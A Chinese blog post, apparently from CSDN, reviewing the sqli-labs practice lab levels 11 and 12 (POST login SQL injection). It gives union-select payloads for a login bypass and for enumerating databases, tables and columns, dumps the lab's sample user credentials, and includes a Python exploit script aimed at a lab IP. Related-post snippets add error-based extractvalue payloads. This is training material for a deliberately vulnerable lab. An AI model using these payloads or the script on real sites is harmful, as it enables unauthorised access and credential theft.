Sqli-labs 复习 Less11-12 基于错误的sql注入 - POST

最新推荐文章于 2024-06-09 21:40:11 发布
最新推荐文章于 2024-06-09 21:40:11 发布
阅读量544 收藏 2
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81592484
版权

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

基于错误的 sql 注入 #

函数讲解

group_concat()多条信息一次查询 

distinct去重

Less-11 报错型sql注入-单引号

  1. 测试

    在 username 中输入 admin’ or ‘1’=’1 #
    在 password 中输入任意内容

  2. 猜字段数

    1 ’ order by 2# // 登录失败,无显示
    1 ’ order by 3# // 登录失败,报错

  3. 猜数据库名

    1’union select 1,@@version#
    1’union select 1,(select database() limit 0,1)#
    1’union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables limit0,1)#

    结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195

  4. 猜表名

    1’union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #

    结果为 emails ,referers ,uagents ,users

  5. 猜列名

    1’ union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#

    结果为 id ,username ,password

  6. 猜数据

    1’ union select 1,group_concat(distinct+username) from security.users #
    1’ union select 1,group_concat(distinct+password) from security.users #

    结果为

    Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

  7. 运行脚本

    #!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import hackhttp
import re

def verify(arg):

    print "verify start..."
    post = "uname=1%27%20union%20select%20md5(123),group_concat(password,0x20)%20from%20users%20 #&passwd=aaa&submit=Submit"
    # payload  必须使用 url 编码

    hh = hackhttp.hackhttp()
    code, head, body, redirect_url, log = hh.http(arg,post)

    if '202cb962ac59075b964b07152d234b70' in body:
        print "目标存在sql注入!"

def exploit(arg):

    print "exploit start..."
    payload = ['username','password']
    username = "\nusername: "  
    for i in payload:
        if i == 'password':
            username += '\npassowrd: '
        post = "uname=1' union select 1,group_concat(distinct+{i}) from security.users #&passwd=aaa&submit=Submit".format(i=i)
        hh = hackhttp.hackhttp()
        code, head, body, redirect_url, log = hh.http(arg,post)
        user = re.findall("Your Password:(.*?)<br>",body)
        for c in user:
            username += c        
    print "目标管理员用户: {username}".format(username=username)

if __name__ == '__main__':
        verify('http://10.10.10.130/sqli-labs/Less-11/?id=')
        exploit('http://10.10.10.130/sqli-labs/Less-11/?id=')

Less-12 报错型sql注入-双引号

  1. 测试

    在 username 中输入 admin”) or (“1”)=(“1 #
    在 password 中输入任意内容

  2. 猜字段数

    1”) order by 2# // 登录失败,无显示
    1”) order by 3# // 登录失败,报错

  3. 猜数据库名

    1”)union select 1,@@version#
    1”)union select 1,database()#
    1”)union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables)#

    结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195

  4. 猜表名

    1”)union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #

    结果为 emails ,referers ,uagents ,users

  5. 猜列名

    1”) union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#

    结果为 id ,username ,password

  6. 猜数据

    1”) union select 1,group_concat(distinct+username) from security.users #
    1”) union select 1,group_concat(distinct+password) from security.users #

    结果为

    Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
网络安全打工人
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less-11 & less-12
water0diamond的博客
03-17 907
POST-Error Based-Single quotes-String (基于错误POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
sqli-labs(less-11)
不知名白帽的博客
07-17 668
sqli-labs(less-11)。less-11(POST注入)
sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入错误注入
最新发布
Superstacks超全栈
06-09 675
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。如果是这样的话,那就只能通过错误信息来获取数据了,如下所示。但这样还不能获取数据,则判断这个注入方式为错误注入。然后经测试采用双引号加注释符就可以验证登录成功。正常输入结果显示成功,不过没有任何提示内容。同样通过这一个点获取数据库名和用户名。通过输入判断出查询字符串的闭合方式为。获取数前数据库的数据名和用户名。获取当前数据库所有的表名。获取user表所有的列名。获取当前数据库所有的表名。获取user表所有的列名。
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 400
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
SQL注入】Less-12基于错误的双引号POST字符型变形的注入
Mitchell_Donovan的博客
03-30 275
Less-12基于错误的双引号POST字符型变形的注入 方式一 extractvalue报错型 1、爆开数据库 payload "*"达到sql注入查询语句闭合!用--+反而不行 name=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit 2、爆开数据表 payload uname=admin" and extractvalue(1,conc
sqli-labs(less-12)
筱阳的博客
06-08 1130
有问题....为什么在less-11输入admin' 会报错  输入admin"" 就不会报错在less-12输入admin" 会报错  输入admin' 就不会报错后来发现输入admin'") 都可以使他们报错,哈哈哈这样即可知道是通过("")来闭合参数的接下来就和less-11一样的操作了接下来用sqlmap同理...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
sqli-labs less-11
爱党人士
06-15 802
1-10就是get,这个是post,会post就肯定会get的啦。 实验环境: firefox hackbar(这个是另一个版本,因为最多人用的那个版本要收费了) less 11: 随便输点东西 url栏没有什么变化, 肯定是post,用hackbar。 快速查看元素技巧: uname和passwd(这个在username右边的编辑框右键查看元素即可看到) 不出所料, 下面就是要对其进行判...
Sqli-labs靶场11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1271
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12sqlilabs less12
sqli-labs (less-11)
kukudeshuo的博客
03-09 2725
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
SQLi-LABS Less-11&&Less-12
m0_64898960的博客
04-20 859
Less-11题目 使用bp抓包进行观察,得知这是POST注入 进行测试 猜字段数 获显示位 查数据库名 查表名 查列名 查列里面的内容 Less-12题目 Less-12具体做法和Less-11一样只不过闭合的姿势不一样而已 由bp抓包得知Less-12闭合的姿势是“ ") ” 然后按上面的步骤就好。 总结 从这里开始已经进入POST注入的专题 POST注入与GET注入 GET方式是在客户端通过URL提交数据,数据在URL中可以看到 POST方式的数据则放置在HTML HEADE
sqli-less 笔记
WYJ____的博客
08-03 416
一 ' ?id=1' ?id=1' and 1=1%23 ?id=1' and 1=2%23 二 数值 ?id=1' ?id=1 and 1=1%23 ?id=1 and 1=2%23 三 ') ?id=1' ?id=1') and 1=1%23 ?id=1') and 1=2%23 四 ") ?id=1") ?id=1") and 1=1%23 ?id=1") and 1...
sqli-lab教程——Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
luosaierdadi的博客
07-09 736
双引号报错型注入按照题意应该是可以使用上一题的payload只需要修改单引号为双引号,但是实际测试不行,无论我使用--+还是%23还是#都不行,我就看了一下php文件:可以看到sql查询语句:@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";构造一个能闭合语句而且会报错的payload:admin" and extractvalue(1,concat(0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值